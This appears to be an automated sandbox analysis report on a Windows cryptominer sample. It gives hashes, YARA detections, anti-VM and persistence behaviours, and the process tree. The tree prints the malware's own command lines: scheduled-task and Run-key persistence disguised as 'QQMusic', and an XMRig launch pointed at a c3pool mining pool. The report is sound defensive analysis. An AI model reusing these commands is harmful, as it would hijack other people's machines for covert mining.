Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
15-06-2024 02:15
Static task
static1
Behavioral task
behavioral1
Sample
d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe
Resource
win10v2004-20240611-en
General
-
Target
d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe
-
Size
9.0MB
-
MD5
a2af48a018c65d34b445bd35bdd1b597
-
SHA1
76daedc184a0cb9a717fc49f86a57b5baed0a35c
-
SHA256
d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60
-
SHA512
d8def07a8accdb65b6b9dfc3168981b600a78310ec06cb626fcd000e7bcc4627ff5be7fc9f26992838226d84982ddd470d9ac89e041727e72b738a61bec61319
-
SSDEEP
196608:rhHMBGC3PtXtT+Was8ywq1wo9JoYx5JAMdJOnZTG1IvQSaKe6NZOn:r2G0jwuwasMdJOnZKVSaaNZOn
Malware Config
Signatures
-
Detects Windows executables referencing non-Windows User-Agents 1 IoCs
resource yara_rule behavioral2/files/0x000700000002355b-162.dat INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA -
UPX dump on OEP (original entry point) 19 IoCs
resource yara_rule behavioral2/files/0x000800000002356f-7.dat UPX behavioral2/memory/3232-8-0x00007FF788180000-0x00007FF7887C4000-memory.dmp UPX behavioral2/memory/3232-15-0x00007FF788180000-0x00007FF7887C4000-memory.dmp UPX behavioral2/memory/1836-19-0x00007FF788180000-0x00007FF7887C4000-memory.dmp UPX behavioral2/memory/3164-143-0x00007FF788180000-0x00007FF7887C4000-memory.dmp UPX behavioral2/memory/3164-145-0x00007FF788180000-0x00007FF7887C4000-memory.dmp UPX behavioral2/memory/4652-149-0x00007FF788180000-0x00007FF7887C4000-memory.dmp UPX behavioral2/memory/1952-156-0x00007FF788180000-0x00007FF7887C4000-memory.dmp UPX behavioral2/memory/5788-159-0x00007FF788180000-0x00007FF7887C4000-memory.dmp UPX behavioral2/memory/5988-164-0x00007FF788180000-0x00007FF7887C4000-memory.dmp UPX behavioral2/memory/1816-168-0x00007FF788180000-0x00007FF7887C4000-memory.dmp UPX behavioral2/memory/6100-172-0x00007FF788180000-0x00007FF7887C4000-memory.dmp UPX behavioral2/memory/6020-176-0x00007FF788180000-0x00007FF7887C4000-memory.dmp UPX behavioral2/memory/3236-184-0x00007FF788180000-0x00007FF7887C4000-memory.dmp UPX behavioral2/memory/6348-188-0x00007FF788180000-0x00007FF7887C4000-memory.dmp UPX behavioral2/memory/6480-192-0x00007FF788180000-0x00007FF7887C4000-memory.dmp UPX behavioral2/memory/6652-195-0x00007FF788180000-0x00007FF7887C4000-memory.dmp UPX behavioral2/memory/6784-199-0x00007FF788180000-0x00007FF7887C4000-memory.dmp UPX behavioral2/memory/7020-203-0x00007FF788180000-0x00007FF7887C4000-memory.dmp UPX -
XMRig Miner payload 17 IoCs
resource yara_rule behavioral2/memory/3232-15-0x00007FF788180000-0x00007FF7887C4000-memory.dmp xmrig behavioral2/memory/1836-19-0x00007FF788180000-0x00007FF7887C4000-memory.dmp xmrig behavioral2/memory/3164-143-0x00007FF788180000-0x00007FF7887C4000-memory.dmp xmrig behavioral2/memory/3164-145-0x00007FF788180000-0x00007FF7887C4000-memory.dmp xmrig behavioral2/memory/4652-149-0x00007FF788180000-0x00007FF7887C4000-memory.dmp xmrig behavioral2/memory/1952-156-0x00007FF788180000-0x00007FF7887C4000-memory.dmp xmrig behavioral2/memory/5788-159-0x00007FF788180000-0x00007FF7887C4000-memory.dmp xmrig behavioral2/memory/5988-164-0x00007FF788180000-0x00007FF7887C4000-memory.dmp xmrig behavioral2/memory/1816-168-0x00007FF788180000-0x00007FF7887C4000-memory.dmp xmrig behavioral2/memory/6100-172-0x00007FF788180000-0x00007FF7887C4000-memory.dmp xmrig behavioral2/memory/6020-176-0x00007FF788180000-0x00007FF7887C4000-memory.dmp xmrig behavioral2/memory/3236-184-0x00007FF788180000-0x00007FF7887C4000-memory.dmp xmrig behavioral2/memory/6348-188-0x00007FF788180000-0x00007FF7887C4000-memory.dmp xmrig behavioral2/memory/6480-192-0x00007FF788180000-0x00007FF7887C4000-memory.dmp xmrig behavioral2/memory/6652-195-0x00007FF788180000-0x00007FF7887C4000-memory.dmp xmrig behavioral2/memory/6784-199-0x00007FF788180000-0x00007FF7887C4000-memory.dmp xmrig behavioral2/memory/7020-203-0x00007FF788180000-0x00007FF7887C4000-memory.dmp xmrig -
Executes dropped EXE 19 IoCs
pid Process 3232 2HIf.exe 1836 2HIf.exe 3164 2HIf.exe 4396 SMB.exe 4652 2HIf.exe 1952 2HIf.exe 5788 2HIf.exe 5988 2HIf.exe 5920 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 1816 2HIf.exe 6100 2HIf.exe 6020 2HIf.exe 3236 2HIf.exe 6348 2HIf.exe 6480 2HIf.exe 6652 2HIf.exe 6784 2HIf.exe 7020 2HIf.exe 7164 2HIf.exe -
resource yara_rule behavioral2/files/0x000800000002356f-7.dat upx behavioral2/memory/3232-8-0x00007FF788180000-0x00007FF7887C4000-memory.dmp upx behavioral2/memory/3232-15-0x00007FF788180000-0x00007FF7887C4000-memory.dmp upx behavioral2/memory/1836-19-0x00007FF788180000-0x00007FF7887C4000-memory.dmp upx behavioral2/memory/3164-143-0x00007FF788180000-0x00007FF7887C4000-memory.dmp upx behavioral2/memory/3164-145-0x00007FF788180000-0x00007FF7887C4000-memory.dmp upx behavioral2/memory/4652-149-0x00007FF788180000-0x00007FF7887C4000-memory.dmp upx behavioral2/memory/1952-156-0x00007FF788180000-0x00007FF7887C4000-memory.dmp upx behavioral2/memory/5788-159-0x00007FF788180000-0x00007FF7887C4000-memory.dmp upx behavioral2/memory/5988-164-0x00007FF788180000-0x00007FF7887C4000-memory.dmp upx behavioral2/memory/1816-168-0x00007FF788180000-0x00007FF7887C4000-memory.dmp upx behavioral2/memory/6100-172-0x00007FF788180000-0x00007FF7887C4000-memory.dmp upx behavioral2/memory/6020-176-0x00007FF788180000-0x00007FF7887C4000-memory.dmp upx behavioral2/memory/3236-184-0x00007FF788180000-0x00007FF7887C4000-memory.dmp upx behavioral2/memory/6348-188-0x00007FF788180000-0x00007FF7887C4000-memory.dmp upx behavioral2/memory/6480-192-0x00007FF788180000-0x00007FF7887C4000-memory.dmp upx behavioral2/memory/6652-195-0x00007FF788180000-0x00007FF7887C4000-memory.dmp upx behavioral2/memory/6784-199-0x00007FF788180000-0x00007FF7887C4000-memory.dmp upx behavioral2/memory/7020-203-0x00007FF788180000-0x00007FF7887C4000-memory.dmp upx -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe" d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe" d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\K: d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe File opened (read-only) \??\VBoxMiniRdrDN d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3288 schtasks.exe -
Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.
pid Process 4976 ipconfig.exe 5028 ipconfig.exe 6220 ipconfig.exe 6952 ipconfig.exe -
Kills process with taskkill 9 IoCs
pid Process 4740 taskkill.exe 6088 taskkill.exe 6400 taskkill.exe 6716 taskkill.exe 7084 taskkill.exe 1716 taskkill.exe 4868 taskkill.exe 5864 taskkill.exe 4836 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe -
Suspicious use of AdjustPrivilegeToken 53 IoCs
description pid Process Token: SeDebugPrivilege 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe Token: SeBackupPrivilege 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe Token: SeSecurityPrivilege 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe Token: SeSecurityPrivilege 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe Token: SeBackupPrivilege 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe Token: SeSecurityPrivilege 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe Token: SeBackupPrivilege 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe Token: SeSecurityPrivilege 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe Token: SeBackupPrivilege 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe Token: SeSecurityPrivilege 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe Token: SeDebugPrivilege 1716 taskkill.exe Token: SeLockMemoryPrivilege 3232 2HIf.exe Token: SeLockMemoryPrivilege 3232 2HIf.exe Token: SeDebugPrivilege 4868 taskkill.exe Token: SeLockMemoryPrivilege 1836 2HIf.exe Token: SeLockMemoryPrivilege 1836 2HIf.exe Token: SeLockMemoryPrivilege 3164 2HIf.exe Token: SeLockMemoryPrivilege 3164 2HIf.exe Token: SeDebugPrivilege 4836 taskkill.exe Token: SeLockMemoryPrivilege 4652 2HIf.exe Token: SeLockMemoryPrivilege 4652 2HIf.exe Token: SeLockMemoryPrivilege 1952 2HIf.exe Token: SeLockMemoryPrivilege 1952 2HIf.exe Token: SeDebugPrivilege 5864 taskkill.exe Token: SeLockMemoryPrivilege 5788 2HIf.exe Token: SeLockMemoryPrivilege 5788 2HIf.exe Token: SeLockMemoryPrivilege 5988 2HIf.exe Token: SeLockMemoryPrivilege 5988 2HIf.exe Token: SeDebugPrivilege 4740 taskkill.exe Token: SeLockMemoryPrivilege 1816 2HIf.exe Token: SeLockMemoryPrivilege 1816 2HIf.exe Token: SeLockMemoryPrivilege 6100 2HIf.exe Token: SeLockMemoryPrivilege 6100 2HIf.exe Token: SeDebugPrivilege 6088 taskkill.exe Token: SeLockMemoryPrivilege 6020 2HIf.exe Token: SeLockMemoryPrivilege 6020 2HIf.exe Token: SeLockMemoryPrivilege 3236 2HIf.exe Token: SeLockMemoryPrivilege 3236 2HIf.exe Token: SeDebugPrivilege 6400 taskkill.exe Token: SeLockMemoryPrivilege 6348 2HIf.exe Token: SeLockMemoryPrivilege 6348 2HIf.exe Token: SeLockMemoryPrivilege 6480 2HIf.exe Token: SeLockMemoryPrivilege 6480 2HIf.exe Token: SeDebugPrivilege 6716 taskkill.exe Token: SeLockMemoryPrivilege 6652 2HIf.exe Token: SeLockMemoryPrivilege 6652 2HIf.exe Token: SeLockMemoryPrivilege 6784 2HIf.exe Token: SeLockMemoryPrivilege 6784 2HIf.exe Token: SeLockMemoryPrivilege 7020 2HIf.exe Token: SeLockMemoryPrivilege 7020 2HIf.exe Token: SeDebugPrivilege 7084 taskkill.exe Token: SeLockMemoryPrivilege 7164 2HIf.exe Token: SeLockMemoryPrivilege 7164 2HIf.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4880 wrote to memory of 4496 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 99 PID 4880 wrote to memory of 4496 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 99 PID 4880 wrote to memory of 4496 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 99 PID 4880 wrote to memory of 5036 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 101 PID 4880 wrote to memory of 5036 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 101 PID 4880 wrote to memory of 5036 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 101 PID 4496 wrote to memory of 3288 4496 cmd.exe 103 PID 4496 wrote to memory of 3288 4496 cmd.exe 103 PID 4496 wrote to memory of 3288 4496 cmd.exe 103 PID 5036 wrote to memory of 1716 5036 cmd.exe 104 PID 5036 wrote to memory of 1716 5036 cmd.exe 104 PID 5036 wrote to memory of 1716 5036 cmd.exe 104 PID 4880 wrote to memory of 4488 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 105 PID 4880 wrote to memory of 4488 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 105 PID 4880 wrote to memory of 4488 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 105 PID 4488 wrote to memory of 4976 4488 cmd.exe 107 PID 4488 wrote to memory of 4976 4488 cmd.exe 107 PID 4488 wrote to memory of 4976 4488 cmd.exe 107 PID 4880 wrote to memory of 3232 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 108 PID 4880 wrote to memory of 3232 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 108 PID 4880 wrote to memory of 3504 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 111 PID 4880 wrote to memory of 3504 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 111 PID 4880 wrote to memory of 3504 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 111 PID 4880 wrote to memory of 1836 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 113 PID 4880 wrote to memory of 1836 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 113 PID 3504 wrote to memory of 4868 3504 cmd.exe 115 PID 3504 wrote to memory of 4868 3504 cmd.exe 115 PID 3504 wrote to memory of 4868 3504 cmd.exe 115 PID 4880 wrote to memory of 3164 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 116 PID 4880 wrote to memory of 3164 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 116 PID 4880 wrote to memory of 4396 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 118 PID 4880 wrote to memory of 4396 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 118 PID 4880 wrote to memory of 4396 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 118 PID 4880 wrote to memory of 4628 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 119 PID 4880 wrote to memory of 4628 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 119 PID 4880 wrote to memory of 4628 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 119 PID 4880 wrote to memory of 4652 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 121 PID 4880 wrote to memory of 4652 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 121 PID 4628 wrote to memory of 4836 4628 cmd.exe 123 PID 4628 wrote to memory of 4836 4628 cmd.exe 123 PID 4628 wrote to memory of 4836 4628 cmd.exe 123 PID 4880 wrote to memory of 1952 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 124 PID 4880 wrote to memory of 1952 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 124 PID 4880 wrote to memory of 1148 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 126 PID 4880 wrote to memory of 1148 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 126 PID 4880 wrote to memory of 1148 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 126 PID 1148 wrote to memory of 5028 1148 cmd.exe 128 PID 1148 wrote to memory of 5028 1148 cmd.exe 128 PID 1148 wrote to memory of 5028 1148 cmd.exe 128 PID 4880 wrote to memory of 5736 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 129 PID 4880 wrote to memory of 5736 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 129 PID 4880 wrote to memory of 5736 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 129 PID 4880 wrote to memory of 5788 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 131 PID 4880 wrote to memory of 5788 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 131 PID 5736 wrote to memory of 5864 5736 cmd.exe 133 PID 5736 wrote to memory of 5864 5736 cmd.exe 133 PID 5736 wrote to memory of 5864 5736 cmd.exe 133 PID 4880 wrote to memory of 5988 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 134 PID 4880 wrote to memory of 5988 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 134 PID 4880 wrote to memory of 828 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 137 PID 4880 wrote to memory of 828 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 137 PID 4880 wrote to memory of 828 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 137 PID 4880 wrote to memory of 1816 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 139 PID 4880 wrote to memory of 1816 4880 d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe 139
Processes
-
C:\Users\Admin\AppData\Local\Temp\d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe"C:\Users\Admin\AppData\Local\Temp\d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe"1⤵
- Adds Run key to start application
- Enumerates connected drives
- Checks for VirtualBox DLLs, possible anti-VM trick
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\SysWOW64\cmd.execmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe /F2⤵
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe /F3⤵
- Creates scheduled task(s)
PID:3288
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im 2HIf.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 2HIf.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
PID:4976
-
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3232
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im 2HIf.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 2HIf.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4868
-
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3164
-
-
C:\ProgramData\SMB.exeC:\ProgramData\SMB.exe2⤵
- Executes dropped EXE
PID:4396
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im 2HIf.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 2HIf.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4836
-
-
-
C:\ProgramData\2HIf.exeC:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4652
-
-
